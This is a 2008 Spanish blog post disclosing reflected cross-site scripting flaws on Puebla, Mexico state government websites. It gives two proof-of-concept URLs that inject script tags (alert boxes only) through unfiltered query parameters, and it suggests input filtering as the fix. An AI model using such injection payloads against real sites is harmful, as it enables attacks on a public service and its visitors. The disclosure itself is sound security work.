lunes, 15 de septiembre de 2008

Vulnerabilidad XSS en www.puebla.gob.mx



Navegando en Internet y probando vulnerabilidades, me encontré el sitio:
http://www.puebla.gob.mx

Muy bonito y funcional. Pero cuenta con graves problemas de seguridad XSS (Cross Site Scripting).

URL's Vulnerables encontradas:

https://portalsfa.sfapuebla.gob.mx/srl/Impuestos/Derechos/Lugares.jsp?desc_servicio=%3Cscript%3Ealert(%27alerta%20de%20seguridad%27);%3C/script%3E%3Cplaintext%3E

http://www.puebla.gob.mx/puebla/complementos/contenido/plantilla.jsp?idmenu=17&pagina=contenido.jsp&id=%3Cscript%3Ealert(%27alerta%27);%3C/script%3E%3Cscript%3Ealert(%27alerta%20de%20seguridad%27);%3C/script%3E

El problema es grave debido a que no se validan las urls de navegación.
Veamos el ejemplo:


Observen que la página muestra el candado de seguridad. Sin embargo hay una grave vulnerabilidad de XSS presente.
Esto se corrije filtrando los datos de la variable Lugares.jsp?desc_servicio=.














Veamos otro ejemplo del XSS en este sitio:

En esta imagen podemos ver que se puede ingresar una cadena específica para afectar al sitio.
Se produjo un error en este gadget.

Etiquetas

INTERNET (457) newsweek (305) SEGURIDAD (225) software (136) HACK (86) Hacker (46) GOOGLE (44) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) video (28) DESCARGA (27) facebook (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) gmail (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) hosting (3) hotmail (3) Guru (2) ajax (2) ataques (2) wpa2 (2)